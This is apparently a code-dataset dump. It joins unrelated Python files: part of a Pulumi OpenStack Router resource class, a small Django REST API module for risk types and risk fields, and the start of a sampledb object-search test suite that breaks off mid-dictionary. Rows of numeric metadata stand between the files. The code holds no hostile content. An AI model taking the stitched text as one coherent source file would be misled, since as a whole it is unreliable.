def external_gateway(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_gateway", value)
@property
@pulumi.getter(name="externalNetworkId")
def external_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
"""
return pulumi.get(self, "external_network_id")
@external_network_id.setter
def external_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_network_id", value)
@property
@pulumi.getter(name="externalSubnetIds")
def external_subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
"""
return pulumi.get(self, "external_subnet_ids")
@external_subnet_ids.setter
def external_subnet_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_subnet_ids", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
A unique name for the router. Changing this
updates the `name` of an existing router.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of string tags for the router.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Map of additional driver-specific options.
"""
return pulumi.get(self, "value_specs")
@value_specs.setter
def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "value_specs", value)
@property
@pulumi.getter(name="vendorOptions")
def vendor_options(self) -> Optional[pulumi.Input['RouterVendorOptionsArgs']]:
"""
Map of additional vendor-specific options.
Supported options are described below.
"""
return pulumi.get(self, "vendor_options")
@vendor_options.setter
def vendor_options(self, value: Optional[pulumi.Input['RouterVendorOptionsArgs']]):
pulumi.set(self, "vendor_options", value)
class Router(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']]] = None,
__props__=None):
"""
Manages a V2 router resource within OpenStack.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
router1 = openstack.networking.Router("router1",
admin_state_up=True,
external_network_id="f67f0d72-0ddf-11e4-9d95-e1f29f417e2f")
```
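A router that also pins an external fixed IP and disables SNAT could look like
the following sketch; the subnet UUID is a placeholder, and `enable_snat`
additionally requires the **ext-gw-mode** Neutron extension:
```python
import pulumi
import pulumi_openstack as openstack
# Hypothetical subnet UUID, for illustration only.
router2 = openstack.networking.Router("router2",
    admin_state_up=True,
    external_network_id="f67f0d72-0ddf-11e4-9d95-e1f29f417e2f",
    enable_snat=False,
    external_fixed_ips=[openstack.networking.RouterExternalFixedIpArgs(
        subnet_id="2e86fdc5-dcf8-4e93-b935-8e9d1b2b01a0",
    )])
```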
## Import
Routers can be imported using the `id`, e.g.
```sh
$ pulumi import openstack:networking/router:Router router_1 014395cd-89fc-4c9b-96b7-13d1ee79dad2
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[RouterArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a V2 router resource within OpenStack.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
router1 = openstack.networking.Router("router1",
admin_state_up=True,
external_network_id="f67f0d72-0ddf-11e4-9d95-e1f29f417e2f")
```
## Import
Routers can be imported using the `id`, e.g.
```sh
$ pulumi import openstack:networking/router:Router router_1 014395cd-89fc-4c9b-96b7-13d1ee79dad2
```
:param str resource_name: The name of the resource.
:param RouterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RouterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RouterArgs.__new__(RouterArgs)
__props__.__dict__["admin_state_up"] = admin_state_up
__props__.__dict__["availability_zone_hints"] = availability_zone_hints
__props__.__dict__["description"] = description
__props__.__dict__["distributed"] = distributed
__props__.__dict__["enable_snat"] = enable_snat
__props__.__dict__["external_fixed_ips"] = external_fixed_ips
if external_gateway is not None and not opts.urn:
warnings.warn("""use external_network_id instead""", DeprecationWarning)
pulumi.log.warn("""external_gateway is deprecated: use external_network_id instead""")
__props__.__dict__["external_gateway"] = external_gateway
__props__.__dict__["external_network_id"] = external_network_id
__props__.__dict__["external_subnet_ids"] = external_subnet_ids
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["value_specs"] = value_specs
__props__.__dict__["vendor_options"] = vendor_options
__props__.__dict__["all_tags"] = None
super(Router, __self__).__init__(
'openstack:networking/router:Router',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_state_up: Optional[pulumi.Input[bool]] = None,
all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
distributed: Optional[pulumi.Input[bool]] = None,
enable_snat: Optional[pulumi.Input[bool]] = None,
external_fixed_ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]]] = None,
external_gateway: Optional[pulumi.Input[str]] = None,
external_network_id: Optional[pulumi.Input[str]] = None,
external_subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
vendor_options: Optional[pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']]] = None) -> 'Router':
"""
Get an existing Router resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_state_up: Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the router, which have been
explicitly and implicitly added.
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
:param pulumi.Input[str] description: Human-readable description for the router.
:param pulumi.Input[bool] distributed: Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
:param pulumi.Input[bool] enable_snat: Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RouterExternalFixedIpArgs']]]] external_fixed_ips: An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
:param pulumi.Input[str] external_gateway: The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
:param pulumi.Input[str] external_network_id: The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_subnet_ids: A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
:param pulumi.Input[str] name: A unique name for the router. Changing this
updates the `name` of an existing router.
:param pulumi.Input[str] region: The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the router.
:param pulumi.Input[str] tenant_id: The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
:param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional driver-specific options.
:param pulumi.Input[pulumi.InputType['RouterVendorOptionsArgs']] vendor_options: Map of additional vendor-specific options.
Supported options are described below.
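As a short sketch, reusing the router ID from the import example above:
```python
import pulumi_openstack as openstack
# Adopt the state of an existing router into the program.
existing = openstack.networking.Router.get("router_1",
    id="014395cd-89fc-4c9b-96b7-13d1ee79dad2")
```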
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RouterState.__new__(_RouterState)
__props__.__dict__["admin_state_up"] = admin_state_up
__props__.__dict__["all_tags"] = all_tags
__props__.__dict__["availability_zone_hints"] = availability_zone_hints
__props__.__dict__["description"] = description
__props__.__dict__["distributed"] = distributed
__props__.__dict__["enable_snat"] = enable_snat
__props__.__dict__["external_fixed_ips"] = external_fixed_ips
__props__.__dict__["external_gateway"] = external_gateway
__props__.__dict__["external_network_id"] = external_network_id
__props__.__dict__["external_subnet_ids"] = external_subnet_ids
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["value_specs"] = value_specs
__props__.__dict__["vendor_options"] = vendor_options
return Router(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminStateUp")
def admin_state_up(self) -> pulumi.Output[bool]:
"""
Administrative up/down status for the router
(must be "true" or "false" if provided). Changing this updates the
`admin_state_up` of an existing router.
"""
return pulumi.get(self, "admin_state_up")
@property
@pulumi.getter(name="allTags")
def all_tags(self) -> pulumi.Output[Sequence[str]]:
"""
The collection of tags assigned on the router, which have been
explicitly and implicitly added.
"""
return pulumi.get(self, "all_tags")
@property
@pulumi.getter(name="availabilityZoneHints")
def availability_zone_hints(self) -> pulumi.Output[Sequence[str]]:
"""
An availability zone is used to make
network resources highly available. Resources that need high availability
are scheduled on different availability zones. Changing this
creates a new router.
"""
return pulumi.get(self, "availability_zone_hints")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Human-readable description for the router.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def distributed(self) -> pulumi.Output[bool]:
"""
Indicates whether or not to create a
distributed router. The default policy setting in Neutron restricts
usage of this property to administrative users only.
"""
return pulumi.get(self, "distributed")
@property
@pulumi.getter(name="enableSnat")
def enable_snat(self) -> pulumi.Output[bool]:
"""
Enable Source NAT for the router. Valid values are
"true" or "false". An `external_network_id` has to be set in order to
set this property. Changing this updates the `enable_snat` of the router.
Setting this value **requires** an **ext-gw-mode** extension to be enabled
in OpenStack Neutron.
"""
return pulumi.get(self, "enable_snat")
@property
@pulumi.getter(name="externalFixedIps")
def external_fixed_ips(self) -> pulumi.Output[Sequence['outputs.RouterExternalFixedIp']]:
"""
An external fixed IP for the router. This
can be repeated. The structure is described below. An `external_network_id`
has to be set in order to set this property. Changing this updates the
external fixed IPs of the router.
"""
return pulumi.get(self, "external_fixed_ips")
@property
@pulumi.getter(name="externalGateway")
def external_gateway(self) -> pulumi.Output[str]:
"""
The
network UUID of an external gateway for the router. A router with an
external gateway is required if any compute instances or load balancers
will be using floating IPs. Changing this updates the external gateway
of an existing router.
"""
return pulumi.get(self, "external_gateway")
@property
@pulumi.getter(name="externalNetworkId")
def external_network_id(self) -> pulumi.Output[str]:
"""
The network UUID of an external gateway
for the router. A router with an external gateway is required if any
compute instances or load balancers will be using floating IPs. Changing
this updates the external gateway of the router.
"""
return pulumi.get(self, "external_network_id")
@property
@pulumi.getter(name="externalSubnetIds")
def external_subnet_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of external subnet IDs to try,
one by one, to obtain a fixed IP for the router. If a subnet ID in the list has
an exhausted floating IP pool, the next subnet ID is tried. This argument is
used only during router creation and allows setting only one external fixed
IP. Conflicts with the `external_fixed_ip` argument.
"""
return pulumi.get(self, "external_subnet_ids")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
A unique name for the router. Changing this
updates the `name` of an existing router.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to obtain the V2 networking client.
A networking client is needed to create a router. If omitted, the
`region` argument of the provider is used. Changing this creates a new
router.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of string tags for the router.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The owner of the router. Required if an admin wants
to create a router for another tenant. Changing this creates a new router.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter(name="valueSpecs")
def value_specs(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Map of additional driver-specific options.
"""
return pulumi.get(self, "value_specs")
@property
@pulumi.getter(name="vendorOptions")
def vendor_options(self) -> pulumi.Output[Optional['outputs.RouterVendorOptions']]:
"""
Map of additional vendor-specific options.
Supported options are described below.
"""
return pulumi.get(self, "vendor_options")
| 49.276268
| 160
| 0.656532
| 6,716
| 54,401
| 5.15411
| 0.042287
| 0.083576
| 0.076296
| 0.041889
| 0.949068
| 0.943637
| 0.93835
| 0.933584
| 0.93211
| 0.921508
| 0
| 0.002274
| 0.256337
| 54,401
| 1,103
| 161
| 49.320943
| 0.853347
| 0.431132
| 0
| 0.871154
| 1
| 0
| 0.116605
| 0.029114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163462
| false
| 0.001923
| 0.013462
| 0
| 0.275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bcb80ebe3612c9bd94156df9a835873425491ec8
| 1,562
|
py
|
Python
|
intuitiveweb/risks/api.py
|
Jonathan-web-dev/Django-Vue
|
ee700e44f653983cdce42b41145a7855564bc661
|
[
"MIT"
] | 1
|
2019-01-09T12:55:46.000Z
|
2019-01-09T12:55:46.000Z
|
intuitiveweb/risks/api.py
|
Jonathan-web-dev/Django-Vue
|
ee700e44f653983cdce42b41145a7855564bc661
|
[
"MIT"
] | 5
|
2020-06-05T18:48:15.000Z
|
2022-01-13T00:49:11.000Z
|
intuitiveweb/risks/api.py
|
New-Bee-Star/Django-Vue
|
ee700e44f653983cdce42b41145a7855564bc661
|
[
"MIT"
] | null | null | null |
from .models import RiskField, RiskType
from .serializers import RiskSerializer, RiskTypeSerializer
from django.shortcuts import get_object_or_404
from rest_framework.generics import ListAPIView, RetrieveAPIView
class ListAllRiskTypeView(ListAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskTypeSerializer
queryset = RiskType.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
return queryset
class ListRiskTypeView(RetrieveAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskTypeSerializer
queryset = RiskType.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
id = self.kwargs.get('id', None)
obj = get_object_or_404(queryset, pk=id)
return obj
class ListAllRiskFieldView(ListAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskSerializer
queryset = RiskField.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
return queryset
class ListRiskFieldView(RetrieveAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskSerializer
queryset = RiskField.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
# make sure to catch 404's below
id = self.kwargs.get('id', None)
obj = get_object_or_404(queryset, pk=id)
return obj
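# A hedged sketch of how these views might be routed; the module path and URL
# prefixes below are assumptions, not taken from this repository. Note the URL
# kwarg must be named `id`, since the views read `self.kwargs.get('id')`.
#
#     from django.urls import path
#     from .api import (ListAllRiskTypeView, ListRiskTypeView,
#                       ListAllRiskFieldView, ListRiskFieldView)
#
#     urlpatterns = [
#         path('risktypes/', ListAllRiskTypeView.as_view()),
#         path('risktypes/<int:id>/', ListRiskTypeView.as_view()),
#         path('riskfields/', ListAllRiskFieldView.as_view()),
#         path('riskfields/<int:id>/', ListRiskFieldView.as_view()),
#     ]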
| 29.471698
| 64
| 0.711908
| 184
| 1,562
| 5.902174
| 0.255435
| 0.088398
| 0.029466
| 0.040516
| 0.734807
| 0.734807
| 0.734807
| 0.734807
| 0.734807
| 0.734807
| 0
| 0.009623
| 0.201665
| 1,562
| 52
| 65
| 30.038462
| 0.861267
| 0.12484
| 0
| 0.75
| 0
| 0
| 0.002976
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
bcba1d139b67707cfdde351960bca956bf38717c
| 120,964
|
py
|
Python
|
tests/logic/test_search.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 5
|
2020-02-13T15:25:37.000Z
|
2021-05-06T21:05:14.000Z
|
tests/logic/test_search.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 28
|
2019-11-12T14:14:08.000Z
|
2022-03-11T16:29:27.000Z
|
tests/logic/test_search.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 8
|
2019-12-10T15:46:02.000Z
|
2021-11-02T12:24:52.000Z
|
# coding: utf-8
"""
"""
import sqlalchemy
import pytest
from sampledb import db
import sampledb.logic
import sampledb.models
@pytest.fixture
def user():
user = sampledb.models.User(
name="User",
email="example@example.com",
type=sampledb.models.UserType.PERSON)
db.session.add(user)
db.session.commit()
return user
@pytest.fixture
def action():
action = sampledb.logic.actions.create_action(
action_type_id=sampledb.models.ActionType.SAMPLE_CREATION,
schema={
'title': 'Example Object',
'type': 'object',
'properties': {
'name': {
'title': 'Name',
'type': 'text'
},
'tags': {
'title': 'Tags',
'type': 'tags'
},
'text_attr': {
'title': 'Text Attribute 1',
'type': 'text'
},
'bool_attr': {
'title': 'Boolean Attribute 1',
'type': 'bool'
},
'bool_attr2': {
'title': 'Boolean Attribute 2',
'type': 'bool'
},
'bool_attr3': {
'title': 'Boolean Attribute 3',
'type': 'bool'
},
'datetime_attr': {
'title': 'Datetime Attribute',
'type': 'datetime'
},
'quantity_attr': {
'title': 'Quantity Attribute',
'type': 'quantity',
'units': 'm'
},
'array_attr': {
'title': 'Array Attribute',
'type': 'array',
'items': {
'title': 'Array Attribute Item',
'type': 'object',
'properties': {
'text_attr': {
'title': 'Array Attribute Item Text Attribute',
'type': 'text'
},
'bool_attr': {
'title': 'Array Attribute Item Boolean Attribute',
'type': 'bool'
}
}
}
}
},
'required': ['name']
}
)
return action
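# The tests below exercise the object search API: plain substrings in simple
# mode, and in advanced mode `#tag` lookups plus `==`/`!=` comparisons over
# booleans, dates (e.g. 2018-10-05) and quoted strings.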
def test_find_by_empty_string(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('', use_advanced_search=False)
assert not use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
def test_find_by_simple_text(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': "This is a test."
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': "This is an example."
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('test', use_advanced_search=False)
assert not use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert 'test' in object.data['text_attr']['text']
def test_find_by_tag(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag1', 'tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('#tag1', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert 'tag1' in object.data['tags']['tags']
def test_find_by_unknown_tag(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag1', 'tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('#tag4', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_attribute(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
def test_find_by_boolean_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
